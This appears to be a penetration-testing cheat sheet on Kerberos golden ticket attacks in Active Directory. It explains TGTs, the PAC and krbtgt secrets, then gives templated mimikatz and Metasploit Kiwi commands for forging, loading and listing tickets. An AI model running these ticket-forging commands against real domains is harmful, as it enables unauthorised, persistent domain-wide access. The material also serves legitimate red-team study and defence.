# Active Directory - Kerberos Golden Tickets

### Overview

`Kerberos` is an authentication protocol, used within Active Directory that
rely on the use of tickets to identify users and grant access to domain
ressources. `Kerberos` implements two type of tickets, issued by two distinct
services of the `Key Distribution Center (KDC)`:
  - `Ticket-Granting Ticket (TGT)`, obtained from the `Authentication Service
  (AS)`
  - `service tickets`, obtained from the `Ticket-Granting Service (TGS)`.

A `TGT` is generally requested by an user through a `KRB_AS_REQ` request to the
`AS` of the `KDC` during the login process on a Windows system integrated to an
Active Directory domain. `TGTs` are encrypted using one of the secrets
(`RC4 key`, whose value is identical to the `NTLM` hash, or `AES 128/256 bits
keys`) of the `krbtgt` account of the domain. After reception of the `TGT`,
in a `KRB_AS_REP` response from the `KDC`, `TGT` are stored in memory by the
client in the `Security Support Provider (SSP) Kerberos` of the `Local Security
Authority Server Service (LSASS)` process.

An user authentication data is stored encrypted (using one of the secrets of
the `krbtgt` account) in the `Privilege Attribute Certificate (PAC)` of the
`TGT` and includes:
  - The `Domain SID` and `User RID`, which combination form the user's current
  `Security Identifier (SID)`
  - the user's `SIDs` kept in its `SIDHistory` attribute
  - The `GROUP_MEMBERSHIP_ARRAY` which contains the user's group memberships,
  in the form of the groups `Relative ID (RID)`.

Whenever generating a `service ticket`, the `TGT`'s `PAC` will be decrypted by
the `KDC`, signed using both one of the secrets of the `krbtgt` account
(`KDC Signature`) and of the targeted service account (`Server Signature`), and
ultimately encrypted using one of the secrets the targeted service account.

`Golden tickets` are `TGT` forged with arbitrary authentication data. Indeed,
the specified username, groups `RID` and `SIDs` will be added to the forged
ticket `PAC`. The `golden ticket` can be injected in the current user session
and used to directly request `service tickets` from the `TGS`.

To generate a `golden ticket`, the following prerequisites are needed:
  - The fully qualified domain name and the `SID` of the targeted domain.
  - One of the secrets of the targeted domain `krbtgt` account. The `krbtgt`
  `RC4` key, corresponding to the `NTLM hash` of the `krbtgt` password, as
  well as the `AES 128/256 bits` keys can be used.

Note that while the user account specified for the `golden ticket` must be a
member of the targeted domain, the arbitrary SIDs added in the SID history of
the forged ticket (`ExtraSids` field of the `PAC`) can come from external
domains or forests (for which trusts relationships are configured).

### Generate golden tickets

###### mimikatz

The `mimikatz` `kerberos::golden` module can be used to generate
`golden tickets`:

```
# Powershell RATS
Get-ADDomain | Ft DNSRoot, DomainSID

mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> </rc4:<KRBTGT_NTLM> | /aes128:<KRBTGT_AES128> | /aes256:<KRBTGT_AES256>> [/groups:<RID | RID_LIST>] [/sids:<EXTRA_SID | EXTRA_SID_LIST>]
```

###### mimikatz with Metasploit

`mimikatz` 2.0 is available in a `meterpreter` shell as the `Kiwi` extension.

To following command can be used to load the extension in memory on a
`meterpreter` shell: `use kiwi`

Once the module has been loaded, the `golden_ticket_create` command can be
used to create a golden ticket:

```
golden_ticket_create -d '<FQDN_DOMAIN>' -s '<SID_DOMAIN>' -k '<KRBTGT_HASH>' -u '<USERNAME>' -t '<FULL_SAVE_PATH>'

Usage: golden_ticket_create [options]
OPTIONS:
    -d <opt>  FQDN of the target domain (required)
    -g <opt>  Comma-separated list of group identifiers to include (eg: 501,502)
    -h        Help banner
    -i <opt>  ID of the user to associate the ticket with
    -k <opt>  krbtgt domain user NTLM hash
    -s <opt>  SID of the domain
    -t <opt>  Local path of the file to store the ticket in (required)
    -u <opt>  Name of the user to create the ticket for (required)
```

Tickets can be loaded/purged using the `kerberos_ticket_use` and
`kerberos_ticket_purge` commands:

```
kerberos_ticket_use <FULL_SAVE_PATH>
kerberos_ticket_purge
```

### Check cached service tickets

The `klist` built-in utility  can be used to list the currently cached kerberos
tickets for the present user session:

```
CMD> klist

Cached Tickets: (X)
...
```

On a `meterpreter` shell, the `kiwi` `kerberos_ticket_list` command can be used:

```
kerberos_ticket_list
```
